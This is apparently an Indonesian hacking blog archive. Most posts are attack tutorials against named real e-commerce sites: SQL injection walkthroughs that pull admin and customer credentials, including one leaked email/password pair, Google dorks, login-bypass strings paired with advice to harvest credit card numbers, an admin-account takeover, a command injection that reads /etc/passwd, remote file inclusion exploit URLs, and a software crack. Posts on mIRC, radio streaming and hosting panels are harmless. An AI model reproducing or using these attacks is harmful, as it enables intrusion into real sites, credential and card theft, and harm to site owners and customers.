:+:+:

Nyari SQL pake schemafuzz

2009-09-07T10:04:00.000-07:00

http://www.softpedia.com/progDownload/Python-Download-54060.html
1. C:\python26\itil.py -u http://www.woodfurnitureforless.com/productsdetail.php?catid=3 --findcol
2. C:\python26\itil.py -u http://www.woodfurnitureforless.com/productsdetail.php?catid=3+AND+1=2+UNION+SELECT+0,darkc0de,2,3 --full
3. C:\python26\itil.py -u http://www.woodfurnitureforless.com/productsdetail.php?catid=3+AND+1=2+UNION+SELECT+0,darkc0de,2,3-- --dump -D nama databasenya -T nama tablenya -C isi column yang di perlukan

Php Shop Blind Sql Injection

2009-07-21T06:16:00.000-07:00

viart sup sql injeksion

2008-07-30T05:22:00.000-07:00

buka mbah gugel
ketik inurl:"product_details.php?item_id=13"
nah tuh banyak web yang keluarz
gua cuntuin satu : http://www.management-ware.com/shop/product_details.php?item_id=13
ganti tulisan itu dengan :

products_rss.php?category_id=1' UNION SELECT concat(login,char(58)
,password),0 FROM va_admins -- /*
jadi : http://www.management-ware.com/shop/products_rss.php?category_id=1
' UNION SELECT concat(login,char(58),password),0 FROM va_admins -- /*
dah kalo ada yang errornya kaya gini :

DB ERROR 1064

We are very sorry, but an error has occurred while processing your request. Please try the operation again by either pressing the Refresh button on your browser, or by going back one page using the Back button. If the error persists, please contact our web development team.

The details of the error are shown below. Please quote this in any correspondance regarding this problem.

Page URL: http://www.management-ware.com/shop/products_rss.php?category_id=1'%20UNION
%20SELECT%20concat(login,char(58),password),0%20FROM%20va_admins%20--%20/*
Referrer URL:
Database error: Invalid SQL: SELECT i.item_id, i.item_type_id, i.item_code, i.item_name, i.friendly_url, i.short_description, i.small_image, i.small_image_alt, i.big_image, i.big_image_alt, i.price, i.is_sales, i.sales_price, i.is_points_price, i.points_price, i.buy_link, i.is_sales, i.full_description, i.manufacturer_code, i.issue_date, ic.category_id, c.category_name, c.short_description AS category_short_description, c.full_description AS category_full_description FROM ((va_items i INNER JOIN va_items_categories ic ON i.item_id=ic.item_id AND ic.category_id IN (1' UNION SELECT concat(login,char(58),password),0 FROM va_admins -- /*,Admin:cca293929882ad831bf724a2589f1e20)) LEFT JOIN va_categories c ON c.category_id = ic.category_id ) WHERE i.is_showing = 1 GROUP BY i.item_id ORDER BY i.item_order, i.item_id
MySQL Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' UNION SELECT concat(login,char(58),password),0 FROM va_admins -- /*,Admin:cca2' at line 1

itu berarti ada kemungkinan lu bisa masuk ke adminya,asal passwordnya bisa didecrypt ajah
hehe

selese,,,,

ASPX Sql Injection :D

2007-12-13T18:42:00.000-08:00

http://bestcatridges.com/catridges/ProductsDetails.aspx?Productid=6
itu website buat contoh aje,hehehe
mulai ah
pertama lu hapus angka 6 ganti dengan
convert(int,(select top%201 table_name from information_schema.tables where table_name not in ('')))
jadi :
http://bestcatridges.com/catridges/ProductsDetails.aspx?Productid=convert(int,(select top%201 table_name from information_schema.tables where table_name not in ('')))

tar muncul error kaya gini :

Line 17: Dim strSql As String = "select * from products p join Subcategories S on p.subcategoryid=s.subcategoryid join companies Cm on s.companyid=Cm.companyid " & _
Line 18: "join Categories Ct on Ct.CategoryId=Cm.CategoryID and P.ProductID=" & Me.ViewState("ProductID")
Line 19: Dim dt As DataTable = GetDataTable(strSql)
Line 20: dlProductsDetails.DataSource = dt
Line 21: dlProductsDetails.DataBind()

Source File: E:\kunden\homepages\44\d154012135\catridges\ProductsDetails.aspx.vb Line: 19

Stack Trace:

[SqlException (0x80131904): Syntax error converting the nvarchar value 'Categories' to a column of data type int.]
System.Data.SqlClient.SqlConnection.OnError(SqlException exception, Boolean breakConnection) +857370
System.Data.SqlClient.SqlInternalConnection.OnError(SqlException exception, Boolean breakConnection) +734982
System.Data.SqlClient.TdsParser.ThrowExceptionAndWarning(TdsParserStateObject stateObj) +188
System.Data.SqlClient.TdsParser.Run(RunBehavior runBehavior, SqlCommand cmdHandler, SqlDataReader dataStream, BulkCopySimpleResultSet bulkCopyHandler, TdsParserStateObject stateObj) +1838
System.Data.SqlClient.SqlDataReader.HasMoreRows() +150
System.Data.SqlClient.SqlDataReader.ReadInternal(Boolean setTimeout) +214
System.Data.SqlClient.SqlDataReader.Read() +9
System.Data.Common.DataAdapter.FillLoadDataRow(SchemaMapping mapping) +156
System.Data.Common.DataAdapter.FillFromReader(DataSet dataset, DataTable datatable, String srcTable, DataReaderContainer dataReader, Int32 startRecord, Int32 maxRecords, DataColumn parentChapterColumn, Object parentChapterValue) +153
System.Data.Common.DataAdapter.Fill(DataTable[] dataTables, IDataReader dataReader, Int32 startRecord, Int32 maxRecords) +283
System.Data.Common.DbDataAdapter.FillInternal(DataSet dataset, DataTable[] datatables, Int32 startRecord, Int32 maxRecords, String srcTable, IDbCommand command, CommandBehavior behavior) +221
System.Data.Common.DbDataAdapter.Fill(DataTable[] dataTables, Int32 startRecord, Int32 maxRecords, IDbCommand command, CommandBehavior behavior) +162
System.Data.Common.DbDataAdapter.Fill(DataTable dataTable) +107
BestCatridgeDAL.GetDataTable(String strSql) +60
ProductsDetails.BindProductDetails() in E:\kunden\homepages\44\d154012135\catridges\ProductsDetails.aspx.vb:19
ProductsDetails.Page_Load(Object sender, EventArgs e) in E:\kunden\homepages\44\d154012135\catridges\ProductsDetails.aspx.vb:10
System.Web.UI.Control.OnLoad(EventArgs e) +99
System.Web.UI.Control.LoadRecursive() +47
System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint) +1061

nah tulisan yang gua bikin gede yaitu 'Categories' ini table pertama yang terdapat di website tadi,lu kopi,trus pastein diantara tanda '' yang ada di depan kata not in jadi :

http://bestcatridges.com/catridges/Products.aspx?prodid=convert(int,(select top%201 table_name from information_schema.tables where table_name not in ('Categories')))
errornya jadi gini :
[SqlException (0x80131904): Syntax error converting the nvarchar value 'Companies' to a column of data type int.]
nah trus lu kopi,trus paste setelah Categories dengan ditambahi , sebelum mastein
jadi not in ('Categories','Companies)))
uda terusin aja sampe table yang lu butuhin semisal gua pake table Customers aja yah :D
ok seteleh nemu errornya kaya gini :
[SqlException (0x80131904): Syntax error converting the nvarchar value 'Customers' to a column of data type int.]
kita ganti sql injeksinya dengan
convert(int,(select top%201 column_name from information_schema.columns where table_name='Customers' and column_name not in ('')))
jadi :

http://bestcatridges.com/catridges/Products.aspx?prodid=convert(int,(select top%201 column_name from information_schema.columns where table_name='Customers' and column_name not in ('')))
tar muncul error yang ngasih value, pastein diantara tada '' yang ada di dalam kurung setelah not in ('')))
sampe data yang dibutuhin lengkap.
gua cuman butuh email ama password misalnya ,
ok
bisa :D
ganti sqlnya dengan :
convert(int,(select%20top%201%20convert
(%20varchar,isnull(convert(varchar,CustomerID),'NULL'))%2b'|--|'%2bconvert(varchar,isnull
(convert(varchar,EmailAddress),'NULL'))%2b'|--|'%2bconvert(varchar,isnull(convert(varchar,
Password),'NULL'))%20from%20Customers%20where%20CustomerID%20not%20in%20('')))
jadi :
http://bestcatridges.com/catridges/Products.aspx?prodid=convert(int,(select%20top%201%20convert
(%20varchar,isnull(convert(varchar,CustomerID),'NULL'))%2b'|--|'%2bconvert(varchar,isnull(convert
(varchar,EmailAddress),'NULL'))
%2b'|--|'%2bconvert(varchar,isnull(convert(varchar,Password),'NULL'))%20from%20Customers%20
where%20CustomerID%20not%20in%20('')))

nah tuh keliatan email ama passwordnya :D
yntax error converting the varchar value '1|--|factorh@yahoo.com|--|factorh' to a column of data type int.

udah tinggal kembangin ajah yah :D

sunsho 4 (bagian 3)

2007-11-03T13:09:00.000-07:00

sini!!!!!!

sunshop 4 (bag 2)

2007-11-03T13:07:00.001-07:00

sini!!!!!!!

SunShop 3.2 masih ada yang bisa juga :D

2007-09-04T09:22:00.000-07:00

eyword: “Powered by SunShop 3.2"
contoh http://www.goldtan.com/shop/index.php
ganti kata index.php dengan admin jadi : http://www.goldtan.com/shop/admin
login pake
user: admin
pass: ‘or”=’

bug digishop masih banyak yang bisa je :D

2007-09-04T09:17:00.000-07:00

--] Buka Google

2--] Ketik inurl:"/cart.php?m=" [atau kreasi lo sendiri]

3--] Pilih salah satu target misalnya
http://uniquescrapbooks.com.au/store/cart.php?m=view.
hapus tulisan cart.php?m= dengan admin.
Jadinya http://uniquescrapbooks.com.au/store/admin
4--] Nanti akan muncul menu login.
Masukkan bug SQL Injection ini untuk Username dan Password
Pada Username dan Password, isi dengan 'or"="

Username :'or"="

Password :'or"="

5--] Klo berhasil, nanti akan muncul Main Menu dan silahkan
cari CC nya. (udah sampe sini silahkan explorasi, jangan terus
minta disuapin lagi)
Liat yang pending orders karena CC nya masih ada, kalau
di pending orders CC nya udah ga ada berarti lo udah
keduluan orang, he...he...he...

6--] Klo yang muncul Invalid Username or Password, berarti SQL
Injection-nya udah ga mempan, he...he...he...silahkan cari
yang lain.

ShopPlus Cart

2007-09-04T09:07:00.000-07:00

Exploit:
host/scripts/shopplus.cgi?dn=domainname.com&cartid=%CARTID%&fil e=;uid|
host/scripts/shopplus.cgi?dn=domainname.com&cartid=%CARTID%&fil e=;cat%20/etc/passwd|

ngeliat ip sendiri ama ip orang lewat windows

2007-09-03T17:30:00.000-07:00

mungkin banyak yah yang nyari ip kebingungan,contoh mau liat ip web detik.com aja harus ke mirc ato kemana gitu,hehehe
nah sekarang gua mau ngasih cara paling gampang buat ngeliat ip orang lewat OS windows.
caranya :
1. tekan window + R
2. ketik nslookup --> Enter,tar kalo udah masuk yang keliatan pertama ip kita seperti :
*** Can't find server name for address 192.168.1.1: Non-existent domain
Default Server: nstot.proxy.aol.com
Address: 205.188.146.145

>
3. nah di tanda > lu ketik domain yang mau lu liat ipnya semisal detik.com lu ketik aja
>detik.com ,trus enter
nah tar keliatan ipnya

> detik.com
Server: nstot.proxy.aol.com
Address: 205.188.146.145

Non-authoritative answer:
Name: detik.com
Addresses: 203.190.241.43, 202.158.66.20, 202.158.66.190, 202.158.66.86
202.158.66.94, 203.190.241.41

nah ip website detik.com ternyata banyak hehehe,ga cuman satu.

udah gitu ajah yah,,,mungkin ada command yang lain yang belum gua tau,belajar lagi deee

Iexpress kegunaannya dan cara pakenya

2007-09-01T08:17:00.000-07:00

Iexpress adalah satu program yang ada di windows,kegunaan dari program ini adalah untuk mengumpulkan data yang masih terpisah menjadi satu,dan bisa di extract kembali.keunggulannya adalah bisa langsung installing program yang udah di kumpulin tadi.

semisal anda mau meninstall winamp dengan GOM player sekaligus,dengan memakai program ini anda bisa melakukannya.

cara pemakaian

1.tekan windows + R
2.ketik iexpress --> Enter
3.klik next
4.tinggal pilih apa file yang mau dikumpulin auto install ataukah hanya berfungsi sebagai winzip atau winrar.

kalau umpamanya ingin dibikin auto install,tinggal klik Extract files and run an installation command

kalau ingin hanya buat file pengganti winzip atau winrar tinggal pilih Extract files only

5.Package title = coba isi dengan test
6.confirmation prompt = isi dengan kata kata sesuka hati anda semisal :cuman test aja ko!!! <--- kalo mau dibikin ada kata katanya kalo ngga tinggal pilih No prompt
7.License agrrement = Do not display a license
8.package files = klik add trus pilihy file yang mau dimasukkin
9.kalo umpanya auto install tar disuruh pilih program mana yang diinstall dulu,tinggal pilih aja programnya,kalo extract file only ga pilihan
10.show window = pilih sesuka hati
11. Finished message = kalo mau dibikin kata kata pilih Display message,masukin kata kata terserah lu,semisal Habis!!!!,kalo ga mau ada kata katanya tinggal pilih No message
12. package name and option = ketik test
13. configure restart = pilih sesuka hati lu
14. Save self Extraction Directive = next
15. create package = next
udah kiranya segitu aja tinggal kembangin aja sendiri yah... hehehhe

Bikin radio online

2007-08-21T06:07:00.000-07:00

yang haurs disiapin :
1. rokok
2. kopi
3. cemilan
persiapan penting :
1. ssh akses
2. winamp
3. shoutcast server
4. Sam Encoder / Sam Broadcaster

udah........ yuk mulai!!!

login ke ssh lu,aplod file shoutcast server ke server lu
caranya :
a. wget http://shoutcast.com/downloads/sc1-9-8/sc_serv_1.9.8_Linux.tar.gz
b. tar -zxvf sc_serv_1.9.8_Linux.tar.gz
c. ./sc_serv

udah kalo ada keterangan :
Event log:
<08/21/07@14:16:46> [SHOUTcast] DNAS/Linux v1.9.8 (Feb 28 2007) starting up...
<08/21/07@14:16:46> [main] pid: 261
<08/21/07@14:16:46> [main] loaded config from sc_serv.conf
<08/21/07@14:16:46> [main] initializing (usermax:32 portbase:8000)...
<08/21/07@14:16:46> [main] No ban file found (sc_serv.ban)
<08/21/07@14:16:46> [main] No rip file found (sc_serv.rip)
<08/21/07@14:16:46> [main] opening source socket
<08/21/07@14:16:46> [main] source thread starting
<08/21/07@14:16:46> [main] opening client socket
<08/21/07@14:16:46> [main] Client Stream thread [0] starting
<08/21/07@14:16:46> [main] client main thread starting
<08/21/07@14:16:46> [source] listening for connection on port 8001
<08/21/07@14:16:54> [sleeping] 0 listeners (0 unique)

berarti udah jalan radionya

trus lu download sam encodernya di :
http://winamp.com/plugins/download/128741

install abis itu buka winamp --> ctrl + P --> DSP/Effect SAM Encoder klik 2 kali tar muncul gambar :

klik tanda + trus pilih MP3 PRO tar keluar windows baru lagi,abis itu lu klik Server Detail
1. Server Ip : lu isi dengan alamat ip ssh lu
2. Server Port : tetep 8000
3. password : ga usah diganti
4. Station Name : nama radio lu
5. Genre : Verious
6. website Url : alamat ip lu tambahin 800/listen.pls contoh http://123.456.789.:8000/listen.pls
7. Aim : ga penting
8. ICQ : ga penting juga
9. IRC Channel : lu tulis channel mirc lu

udah???
lu klik Conventer :
Quality : Medium
Format : Mp3 24 Kb/s, 11.0 kHz Stereo <-- ini sesuaikan dengan kapasitas koneksi elu :P~

klik ok.
akan muncul
1. MP3: 24 Kb/s, 11.0 kHz Stereo Not Connected
tulisan itu klik dua kali abis itu pilih start All udah jadi deh radio lu coba temen lu suruh dengerin....... wkekekek

by : Elang13

sedikit tentang plesk WHM cpanel

2007-08-21T00:59:00.000-07:00

plesk hampir sama kaya whm,bedanye kalo whm lebih condong ke cpanel kalo plesk ga ada condongnya,plesk ya plesk,kalo whm itu pusat dari cpanel,alias root dari cpanel.
persamaannya adalah sama sama buat add hosting.wew,gratis???kalo lu punya plesk ato whm ya gratis dong,tinggal lu beli domainnya aje,trus hostingnya lu add sendiri dari plesk ato whm tadi.

caranya??

1. plesk

login ke admin plesk lu dengan nambahin port 8443 didepan nama domainnya contoh :
http://domainplesklu.com:8443
login abis itu klik domains yang ada dibawah Home-->add new domain --> udah tinggal lu pilih sesuka hati lu,mau unlimited semua juga bisa,xixixixi.
abis itu set shared ip dari plesk lu ke domain yang uda disiapin.

udah tinggal edit aja dari ftp yang lu set di plesk lu,caranya lu login ke ftp domain lu,trus aplod file yang uda lu bikin kalo mau dibikin web php tinggal lu aplod aja file phpnya trus install deh.
kalo web html bisa bikin di plesk admin domain lu,contoh : http://domainlu:8443
login abis itu klik Manage Files On Domain--> httpdocs index.html nya lu edit aja mau tambahin file tinggal aplod ato add new file.

kalo mau bikin database tinggal klil aja Create a Database
menunya ada semua tinggal lu utak atik aje :D

2. WHM

whm juga sama kaya plesk,cuman bedanya kalo udah diadd di whm kita bisa login dari cpanel dengan port kebanyakan 2082 contoh http://domainlu.com:2082
udah setting aje terserah elu xixixixi

peppercart cgi

2007-08-01T20:36:00.000-07:00

buka guguel
ketik
intitle:"Peppercart"
contoh target :
http://www.cirrusaviation.com/cgi-bin/cart.pl?CL=1
ganti tulisan cart.php?blablabla=blablabla dengan :

setup.pl?open=orders&CCID=DMGBCXX5
jadi : http://www.cirrusaviation.com/cgi-bin/setup.pl?
open=orders&CCID=DMGBCXX5

nah tuh udah di admin orders
wkekeke
tinggal diubek ubek aja websitenya

kelemahan sunshop 4

2007-08-01T17:04:00.000-07:00

setelah sunshop ketemu bug rfinya,sunshop langsung apdet,tapi apdet juga ternyata masih banyak kelemahannya,hehehe
rfi bisa,add admin juga bisa,xss juga bisa,xixixi
tapi sekarang yang mau gua tulis yang add admin aja deh,kayaknya menarik sih,wkakakaka,menarik kuntulnya.

udah ah mulai banyakan basa basi,tar basi beneran.
buka mas gugel
ketik : allinurl:"index.php?l=account"
contohnye : http://www.urbanisticresults.com/index.php?l=account

nah trus index.php?l=account ganti dengan install/install2.php
jadi gini :
http://www.urbanisticresults.com/install/install2.php
udah tinggal continue aje,xixixixi sampe step 4 nah disitu kan disuruh masukin
1. Desired User Name:
2. Desired Password:
3. Email Address:

isi sesuai keinginan lu aje deh,email nagarang aje ga usah pake email asli.

udah dulu yeee

mau lebih gampang??

buka web ini :
http://h1.ripside.net/ifx/sunsop4.php

ada 2 kotak
1. linking (isi target dengan contoh http://www.urbanisticresults.com/install/install2.php)
2. \$_POST\['???'\] : isi dengan step

trus tar ada kotak lagi satu lagi,nah kalo kotak yang kedua cuman 1 kotak,isi dengan 6[kalo targetnya minta license] 4 [kalo targetnya ga minta license].
udah deh
xixixixi

donlot mp3 dari mirc???

2007-05-26T23:41:00.000-07:00

banyak yang belum tau gimana cara ngedonlot lagu dari mirc,nih caranya :
1. masuk ke mirc server irc.theoneserv.net ato ke irc.mildnet.org,kalo dari server theone lu masuk ke channel #theone kalo dari irc.mildnet.org masuk chanel #indomp3
2.ketik @find (nama lagu) / (penynayi) / (album) tanpa tanda kurung,contoh @find peterpan , tar ada yang pv contoh !poetDl peterpan_-_hari-yang-cerah_-_Kota_mati.mp3 nah tulisan itu lu copy,cara ngopynya gimana??,hehe tar itu gua tulis lengkap dibuku gua yang mudah mudahan bulan depan terbit,ya udah gua kasih tau sekarang juga gapapa,hehehe,caranya lu blok aja tulisan dari ! sampe MB.
3. lu pastein di channel,tar tunggu ada kiriman,nah abis itu lu accept, udah kalo warna birunya jalan berarti uda jalan donlotannya,tinggal tunggu ampe abis,trus lu puter di winamp.

udah gitu aja hehehe

Sphider Version 1.2.x (include_dir) remote file include

2007-04-30T01:28:00.000-07:00

================poetcrew Advosory==============
# Sphider Version 1.2.x (include_dir) remote file include
# script Vendor: http://cs.ioc.ee/~ando/sphider/
# Discovered by: IbnuSina
found on index.php
$include_dir = "./include"; <--- no patch here
$language_dir = "./languages";
include "$include_dir/index_header.inc";
include "$include_dir/conf.php";
include "$include_dir/connect.php";

exploitz : http://targe.lu/[sphiderpath]/index.php?include_dir=injekan.lu?
Dork : inurl:"shpider/index.php"

File Upload System V1.0 (AD_BODY_TEMP) multiple file include

2007-03-23T13:01:00.000-07:00

============================ HItamputih Crew ====================
# hitamputih Advisory
# Discovered By : IbnuSina & jipank
#-----------------------------------------------------------
# Software: File Upload System V1.0
# Script Demo: http://demo.free-php-scripts.net/File_Upload
# Method: file inclusion
# Thanks To : akukasih,nyubi,irvian,BlueSpy,kurt_kabayan and all #hitamputih crew

[[Exploitz]]---------------------------------------------------------

?php include($AD_BODY_TEMP);?>

exploit :

http://target.com/[PATH]/contact.php?AD_BODY_TEMP=http://injekan.lu
http://target.com/[PATH]/login.php?AD_BODY_TEMP=http://injekan.lu
http://target.com/[PATH]/register.php?AD_BODY_TEMP=http://injekan.lu
http://target.com/[PATH]/forgot_pass.php?AD_BODY_TEMP=http://injekan.lu

gugel dork : intext:"Marsal Design Co."

Ngecrack Turbo Msn yang ada di nokia 7710

2007-03-12T13:38:00.000-07:00

ceritanya gini,gw kemarin abis beli hp nokia 7710 ada aplikasi msnnya,tapi ko minta serial number,xixixixi
asem deh,trus gw utak atik dah tu aplikasi.
akhirnya gw nemu cara ngecrack aplikasi tadi.
kalo lu ada yang belum punya serial numbernya,gampang ko.coba isi dikotak serial numbernya angka 1 semua,hehehe pasti langsung register succesfully!!! xixixi
kalo minta lagi tinggal masukin angka 1 sekali saja,udah ga bakal minta lagi.
mungkin bisa buat semua aplikasi turbo msn
daripada beli ngabisin duit,hahahaha.
selagi ada yang gratis napa ga dipergunain dengan baik,ya ngga??
:P~
aplikasinya bisa didonlot di

http://www.mobileinttech.com/

Jshop Server 1.3 (fieldValidation.php) file include

2007-01-10T13:47:00.000-08:00

==========================================================================
# scripts : Jshop Server 1.3
# Discovered By : irvian
# script : http://www.jshop.co.uk/
# Thanks To : #hitamputih #nyubicrew #patihack
# special To : ibnusina,arioo,jipank,kacung,trangkil,cah_gemblunkz
# dork : "powered by Jshop"
--------------------------------------------------------------------------
file: routines/fieldValidation.php
include($jssShopFileSystem."resources/includes/validations.php");

exploit : http://www.target.com/routines/fieldValidation.php?jssShopFileSystem=[evilcode]
-----------------------------------------------------------------------------------------------

ppc engine Multiple file inclusion

2007-01-08T16:45:00.000-08:00

============================ HItamputih Crew ====================
# hitamputih Advisory
# Discovered By : IbnuSina
#-----------------------------------------------------------
# Software: ppc engine
# Method: file inclusion
# Thanks To : akukasih,nyubi,irvian,BlueSpy and all #hitamputih crew

[[SQL]]]---------------------------------------------------------
on dir config
file config_admin.php

    require($INC."functions/functions_admin.php");

//    require($INC."functions/functions_payment.php");

 require($INC."config/admin_pw.php");

 require($INC."config/config_member.php");

file config_main.php

        require($INC."config/site_url.php");

     require($INC."config/mysql_config.php");

     require($INC."functions/functions_main.php");

     require($INC."functions/external_results.php");

file config_member.php
=================


 require($INC."functions/functions_member.php");

 require($INC."functions/functions_payment.php");

file mysql_config.php
===============

    require($INC."functions/db_functions.php");

 require($INC."config/db_info.php");

explot :

http://target.lu/path/config/config_admin.php?INC=http://injekan.lu?
http://target.lu/path/config/config_main.php?INC=http://injekan.lu?
http://target.lu/path/config/config_member.php?INC=http://injekan.lu?
http://target.lu/path/config/mysql_config.php?INC=http://injekan.lu?

on dir admini

file admin.php
===========


 require($INC."config/config_main.php");

 require($INC."config/config_admin.php");

 require($INC."functions/functions_bu_and_reports.php");

 require($INC."config/dbstructure.php");

file index.php
============

    require("path.php");
 require($INC."config/config_main.php");
 require($INC."config/config_admin.php");

exploit :

http://target.lu/path/admini/admin.php?INC=http://injekan.lu?
http://target.lu/path/admini/index.php?INC=http://injekan.lu?

on dir paypalipn
file ipnprocess.php

    require($INC."config/config_main.php");
 require($INC."functions/functions_payment.php");

exploit :

http://target.lu/path/paypalipn/ipnprocess.php?INC=http://injekan.lu?

on dir members

    require($INC."config/config_main.php");
 require($INC."config/config_member.php");
 require($INC."functions/functions_bu_and_reports.php");

exploit :

http://target.lu/path/members/index.php?INC=http://injekan.lu?
http://target.lu/path/members/registration.php?INC=http://injekan.lu?

on dir main
file index.php

    require("path.php");
 require($INC."config/config_main.php");
 require($INC."config/config_main2.php");
 require($INC."functions/functions_search.php");
 mysql_connect ($DBHost, $DBLogin, $DBPassword);

file ppcbannerclick.php and ppcclick.php

    require("path.php");
 require($INC."config/config_main.php");

exploit :

http://target.lu/path/main/ppcbannerclick.php?INC=http://injekan.lu?
http://target.lu/path/main/ppcclick.php?INC=http://injekan.lu?

google dork : intitle:"ppc engine admin login form"
=======================================================

magic photo storage website Multiple Remote File Inclusion

2007-01-08T14:57:00.000-08:00

============================ HItamputih Crew ====================
# hitamputih Advisory
# Discovered By : IbnuSina
#-----------------------------------------------------------
# Software: createauction
# Script : http://www.scriptaty.net/magic-photo-storage-website.html
# Method: file inclusion
# Thanks To : akukasih,nyubi,irvian,BlueSpy and all #hitamputih crew

[[SQL]]]---------------------------------------------------------
on dir admin

require_once '../include/config.php';
require_once $_config['site_path'] . '/include/admin_function.php';

exploit :

http://target.lu/path/admin/admin_password.php?_config[site_path]=http://injekan.lu?
http://target.lu/path/admin/add_welcome_text.php?_config[site_path]=http://injekan.lu?
http://target.lu/path/admin/admin_email.php?_config[site_path]=http://injekan.lu?
http://target.lu/path/admin/add_templates.php?_config[site_path]=http://injekan.lu?
http://target.lu/path/admin/admin_paypal_email.php?_config[site_path]=http://injekan.lu?
http://target.lu/path/admin/approve_member.php?_config[site_path]=http://injekan.lu?
http://target.lu/path/admin/delete_member.php?_config[site_path]=http://injekan.lu?
http://target.lu/path/admin/index.php?_config[site_path]=http://injekan.lu?
http://target.lu/path/admin/list_members.php?_config[site_path]=http://injekan.lu?
http://target.lu/path/admin/membership_pricing.php?_config[site_path]=http://injekan.lu?
http://target.lu/path/admin/send_email.php?_config[site_path]=http://injekan.lu?

on dir include
file config.php

require_once $_config['site_path'] . '/include/db_config.php'

exploit :

http://target.lu/path/include/config.php?_config[site_path]=http://injekan.lu?

file db_config.php


require_once $_config['site_path'] . '/class/mysql.class.php';

exploit :

http://target.lu/path/include/db_config.php?_config[site_path]=http://injekan.lu?

on file common_function.php

require_once $_config['site_path'] . '/class/session.class.php';
require_once $_config['site_path'] . '/class/validator.class.php';
require_once $_config['site_path'] . '/include/message.php';

http://target.lu/path/include/common_function.php?_config[site_path]=http://injekan.lu?

on dir user

require_once '../include/config.php';
require_once $_config['site_path'] . '/include/user_function.php';

exploit :

http://target.lu/path/user/add_category.php?_config[site_path]=http://injekan.lu?
http://target.lu/path/user/add_news.php?_config[site_path]=http://injekan.lu?
http://target.lu/path/user/change_catalog_template.php?_config[site_path]=http://injekan.lu?
http://target.lu/path/user/couple_milestone.php?_config[site_path]=http://injekan.lu?
http://target.lu/path/user/couple_profile.php?_config[site_path]=http://injekan.lu?

http://target.lu/path/user/delete_category.php?_config[site_path]=http://injekan.lu?

http://target.lu/path/user/index.php?_config[site_path]=http://injekan.lu?
http://target.lu/path/user/login.php?_config[site_path]=http://injekan.lu?
http://target.lu/path/user/logout.php?_config[site_path]=http://injekan.lu?
http://target.lu/path/user/register.php?_config[site_path]=http://injekan.lu?
http://target.lu/path/user/upload_photo.php?_config[site_path]=http://injekan.lu?
http://target.lu/path/user/user_catelog_password.php?_config[site_path]=http://injekan.lu?
http://target.lu/path/user/user_email.php?_config[site_path]=http://injekan.lu?
http://target.lu/path/user/user_extend.php?_config[site_path]=http://injekan.lu?
http://target.lu/path/user/user_membership_password.php?_config[site_path]=http://injekan.lu?

##############################################

createauction (catid) Remote SQL Injection Vulnerability

2007-01-06T23:40:00.000-08:00

createauction (catid) Remote SQL Injection Vulnerability
============================ HItamputih Crew ====================
# hitamputih Advisory
# Discovered By : IbnuSina
#-----------------------------------------------------------
# Software: createauction
# Vendor : http://www.createauction.com/
# Method: SQL Injection
# Thanks To : akukasih,nyubi,irvian and all #hitamputih crew
# special to: str0ke@milw0rm.com
[[SQL]]]---------------------------------------------------------
http://[target]/[path]/cats.asp?catid=[SQL]

ex:

http://[target]/[path]/cats.asp?catid=1%20%20and%201=
convert(int,(select%20top%201%20username%2b'/'%2bpassword%20from%20users))
--sp_password

##############################################

Mirc I :D

2006-12-31T14:38:00.000-08:00

Mungkin kalian bertanya Tanya mengapa bukan yang lain yang dibahas,tapi malah mirc. Banyak sekali orang orang yang ahli chatting yahoo messenger namun setelah disuruh masuk ke mirc, kebingungan gimana cara masuknya,dan gimana cara chattingnya,hehe,,,mudahkan jawaban penulis,itu cuman salah satu sebab penulis ingin sekali menulis tentang dunia MiRc,udah dulu basa basinya,tar keburu datang bulan,hueheu.

Persiapan

Yang perlu dipersiapin cuman software ama otak,dan kejelian kalian aja,Ko begitu?? Hehe,, ya iyalah soalnya chatting di MiRc sulit sulit gampang,ko bisa?? Hm,,, mudahnya chattingan di mirc kalian cuman disuruh masukin nick doank dan channel yang ada di MiRc lebih komplit daripada YM,nah sekarang sulitnya apa?? Sulitnya mempunyai command command tersendiri,yang sama sekali ngga ada di YM,di bawah ini list command yang disediakan pihak MiRc sendiri :

1. /server = kalian ngga bakalan bisa chatt di Mirc sebelum memasukkan salah satu server yang di sediain oleh mirc,dan di bawah ini beberapa server yang disediain oleh Mirc:
a. Dalnet
irc.dal.net
mesra.kl.my.dal.net
dragons.dal.net
rumble.dal.net
loyalty.dal.net
b.Effnet
irc.eff.net
c.nullus
Irc.nullus.net
Yang diatas hanya sebagian kecil,karna saking banyaknya server yang disedian oleh MiRc ampe penulis ga apal,heuheuehu maklum lah namanya juga manusia,
Dari satu command ini mungkin timbul banyak sekali pertanyaan,mungkin salah satunya yaitu : tadi penulis bilang yang diatas adalah sebagian server yang disediain oleh MiRc,brarti ada server yang bukan disediain oleh MiRc sendiri dunk?? Nah pertanyannya apakah ada server yang bukan disediain oleh mirc,kalo ada kasih contoh servernya,dan gimana cara bikinnya???
Jawabannya banyak sekali server pribadi alias server bukan dari pihak MiRc
Sperti server khusus buat ngedonlot lagu kepunyaan orang indo yaitu fastserv.theoneserv.net ada lagi server buat para carder Indonesia yaitu, irc.bagicc.com,untuk masalah bikin server akan dibahas dibagiaannya sendiri entar yah,sabar dumz,hehe,,,
2. /join ato bisa disingkat /j = command buat join kesalah satu channel yang ada di server itu,kebanyakan server yang channelnya penuh ada di irc.dal.net server paling banyak diminati oleh para MiRc mania,
3. /invite = buat nginvite salah satu nick untuk join ke channel kita ,caranya
kita ketik /invite #channel
4. /whois = buat ngedetek nick yang kita whois lagi chat dimana,dichannel mana aja. Cranya ketik /whois
5. /part = command agar kita keluar dari salah satu channel yang sedang kita joini,caranya /part #channel bisa juga kita tambahin kata kata agar part kita ada pesennya yaitu seperti /part #hitamputih keluar dulu ah.
6. /list = buat ngeliat ada berapa channel yang kita ingin tau,untuk mengelist channel caranya /list hitam ato terserah make keyword apa ajah yang penting maximal 20 huruf.
7. /msg = buat ngirim messege ke salah satu nick yangs edang online,caranya /msg

sebenernya masih ada lagi command dari pihak MiRc tapi karna computer penulis huruf ki nya ga isa,jadi mending ga usah di tulis,dan kalo pengin melihat command yang ada tinggal ketik /help di mirc kalian.

Kelebihan MiRc

Kalian pasti dah tau segala apa yang ada didunia pasti mempunyai kelebihan dan kekurangan,begitu juga MiRc dia mempunyai banyak sekali kelebihan di banding program chat yang lain.diantaranya:

1. bisa digabungin antara server yang disediain oleh MiRc sama server yang kita buat,caranya sulit sulit mudah,coz kita buat server sendiri memakai domain orang alias nitip file PsyBnc,PsyBnc apa lagi tuh??
